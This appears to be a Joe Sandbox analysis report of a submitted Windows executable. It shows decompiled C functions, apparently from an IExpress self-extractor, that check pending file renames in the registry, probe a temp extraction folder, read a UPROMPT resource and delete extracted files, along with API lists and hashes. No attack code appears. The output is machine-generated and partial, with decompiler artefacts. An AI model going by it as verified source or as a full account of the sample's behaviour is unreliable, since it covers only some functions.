                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 8d256d-8d257d 564 8d2583-8d2589 563->564 565 8d2622-8d2627 call 8d24e0 563->565 566 8d25e8-8d2607 RegOpenKeyExA 564->566 567 8d258b 564->567 569 8d2629-8d262f 565->569 571 8d2609-8d2620 RegQueryInfoKeyA 566->571 572 8d25e3-8d25e6 566->572 567->569 570 8d2591-8d2595 567->570 570->569 574 8d259b-8d25ba RegOpenKeyExA 570->574 575 8d25d1-8d25dd RegCloseKey 571->575 572->569 574->572 576 8d25bc-8d25cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E008D24E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,008D4096,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?), ref: 008D25B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?,008D4096), ref: 008D25CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,008D1ED3,00000001,00000000,?,?,008D4137,?,008D4096), ref: 008D25DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,008D4096,008D4096,?,008D1ED3,00000001,00000000,?,?,008D4137,?), ref: 008D25FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,008D4096,00000000,00000000,00000000,00000000,?,008D1ED3,00000001,00000000), ref: 008D261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 008D25C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008D25F5
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 008D25A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 425bd8cdc7b546bebacf03b20bcacf97a506f77127925058996924da996357be
                                                                                                                                                                                                                                            • Instruction ID: 157c26c4f19d52644bc46741f746f4a9b2126a69d0b5872b3ec3c25937c54c63
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 425bd8cdc7b546bebacf03b20bcacf97a506f77127925058996924da996357be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09115435942228FB9B249B92AC09DFF7F7CFF657A1F104257B808E2250D6309E44D6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            C-Code - Quality: 51%
_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    signed int* _t25;
    signed int _t26;
    signed int _t29;
    int _t30;
    signed int _t37;
    signed char _t41;
    signed int _t53;
    signed int _t54;
    intOrPtr _t56;
    signed int _t58;
    signed int _t59;
    intOrPtr* _t60;
    void* _t62;
    void* _t67;
    void* _t68;

    E008D7155();
    _push(0x58);
    _push(0x8d72b8);
    E008D7208(__ebx, __edi, __esi);
    *(_t62 - 0x20) = 0;
    GetStartupInfoW(_t62 - 0x68);
    *((intOrPtr*)(_t62 - 4)) = 0;
    _t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
    _t53 = 0;
    while(1) {
        asm("lock cmpxchg [edx], ecx");
        if(0 == 0) {
            break;
        }
        if(0 != _t56) {
            Sleep(0x3e8);
            continue;
        } else {
            _t58 = 1;
            _t53 = 1;
        }
        L7:
        _t67 =  *0x8d88b0 - _t58; // 0x2
        if(_t67 != 0) {
            __eflags =  *0x8d88b0; // 0x2
            if(__eflags != 0) {
                *0x8d81e4 = _t58;
                goto L13;
            } else {
                *0x8d88b0 = _t58;
                _t37 = E008D6C3F(0x8d10b8, 0x8d10c4); // executed
                __eflags = _t37;
                if(__eflags == 0) {
                    goto L13;
                } else {
                    *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                    _t30 = 0xff;
                }
            }
        } else {
            _push(0x1f);
            L008D6FF4();
            L13:
            _t68 =  *0x8d88b0 - _t58; // 0x2
            if(_t68 == 0) {
                _push(0x8d10b4);
                _push(0x8d10ac);
                L008D7202();
                *0x8d88b0 = 2;
            }
            if(_t53 == 0) {
                *0x8d88ac = 0;
            }
            _t71 =  *0x8d88b4;
            if( *0x8d88b4 != 0 && E008D7060(_t71, 0x8d88b4) != 0) {
                _t60 =  *0x8d88b4; // 0x0
                *0x8da288(0, 2, 0);
                *_t60();
            }
            _t25 = __imp___acmdln; // 0x76235b9c
            _t59 =  *_t25;
            *(_t62 - 0x1c) = _t59;
            _t54 =  *(_t62 - 0x20);
            while(1) {
                _t41 =  *_t59;
                if(_t41 > 0x20) {
                    goto L32;
                }
                if(_t41 != 0) {
                    if(_t54 != 0) {
                        goto L32;
                    } else {
                        while(_t41 != 0 && _t41 <= 0x20) {
                            _t59 = _t59 + 1;
                            *(_t62 - 0x1c) = _t59;
                            _t41 =  *_t59;
                        }
                    }
                }
                __eflags =  *(_t62 - 0x3c) & 0x00000001;
                if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                    _t29 = 0xa;
                } else {
                    _t29 =  *(_t62 - 0x38) & 0x0000ffff;
                }
                _push(_t29);
                _t30 = E008D2BFB(0x8d0000, 0, _t59); // executed
                *0x8d81e0 = _t30;
                __eflags =  *0x8d81f8;
                if( *0x8d81f8 == 0) {
                    exit(_t30); // executed
                    goto L32;
                }
                __eflags =  *0x8d81e4;
                if( *0x8d81e4 == 0) {
                    __imp___cexit();
                    _t30 =  *0x8d81e0; // 0x80070002
                }
                *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                goto L40;
                L32:
                __eflags = _t41 - 0x22;
                if(_t41 == 0x22) {
                    __eflags = _t54;
                    _t15 = _t54 == 0;
                    __eflags = _t15;
                    _t54 = 0 | _t15;
                    *(_t62 - 0x20) = _t54;
                }
                _t26 = _t41 & 0x000000ff;
                __imp___ismbblead(_t26);
                __eflags = _t26;
                if(_t26 != 0) {
                    _t59 = _t59 + 1;
                    __eflags = _t59;
                    *(_t62 - 0x1c) = _t59;
                }
                _t59 = _t59 + 1;
                *(_t62 - 0x1c) = _t59;
            }
        }
        L40:
        return E008D724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008D7182
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetCurrentProcessId.KERNEL32 ref: 008D7191
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetCurrentThreadId.KERNEL32 ref: 008D719A
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: GetTickCount.KERNEL32 ref: 008D71A3
                                                                                                                                                                                                                                              • Part of subcall function 008D7155: QueryPerformanceCounter.KERNEL32(?), ref: 008D71B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,008D72B8,00000058), ref: 008D6A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 008D6AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 008D6AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 008D6B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 008D6B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 008D6BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 008D6BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: de6659a172fd2e2bca771c07cac27641ba5292316a5e322c9b9054f6674093ed
                                                                                                                                                                                                                                            • Instruction ID: 55a5b231617b6fab2c256a749597afbb49dc322b8666b6ea0cc7864fc3ae3e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de6659a172fd2e2bca771c07cac27641ba5292316a5e322c9b9054f6674093ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9841EF3194576DDFDB21AB69D805B6A77A0FB44730F24032BE842E3390EF744C519B81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 8d58c8-8d58d5 632 8d58d8-8d58dd 631->632 632->632 633 8d58df-8d58f1 LocalAlloc 632->633 634 8d5919-8d5959 call 8d1680 call 8d658a CreateFileA LocalFree 633->634 635 8d58f3-8d5901 call 8d44b9 633->635 638 8d5906-8d5910 call 8d6285 634->638 644 8d595b-8d596c CloseHandle GetFileAttributesA 634->644 635->638 645 8d5912-8d5918 638->645 644->638 646 8d596e-8d5970 644->646 646->638 647 8d5972-8d597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E008D1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E008D658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x008d5910
                                                                                                                                                                                                                                            0x008d5910
                                                                                                                                                                                                                                            0x008d5918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D58E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-1664176527
                                                                                                                                                                                                                                            • Opcode ID: 371714b0e9983b3a55df0bb426d550a038876766f3901d5c9122433f64b195f0
                                                                                                                                                                                                                                            • Instruction ID: 68092119a4eb7de3ef273155167edf6530a9f3dc72f25b689e3627cc4665394e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 371714b0e9983b3a55df0bb426d550a038876766f3901d5c9122433f64b195f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A110031602220BBCB281F7EAC4EE9B7F99FF46370B200717F51AD2381DA748C0582A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D51E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E008D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E008D468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E008D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x8d9124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F4D,?,00000002,00000000), ref: 008D5201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008D5250
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 5954bbc6725c30be4bea322df573935945e5a0f1bf370da87be7f2480bbdd4f4
                                                                                                                                                                                                                                            • Instruction ID: 0913b50459b7a428c4829243670df784f94f6c05fd238b68dd83778e62dbdc3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5954bbc6725c30be4bea322df573935945e5a0f1bf370da87be7f2480bbdd4f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A110871242605BBE7186BB55C4AF3B739EFB89754F10432BF642D6390EA7D8C044125
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E008D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x8d91e0; // 0x33c7140
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x8d8a24 == 0 &&  *0x8d9a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x8d8a24 == 0 &&  *0x8d9a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E008D1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					if(( *0x8d9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E008D65E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E008D2390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x8d9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E008D1FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x8d8a20 =  *0x8d8a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E008D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(033C7140,00000080,?,00000000), ref: 008D52F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(033C7140), ref: 008D52FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033C7140,?,00000000), ref: 008D5305
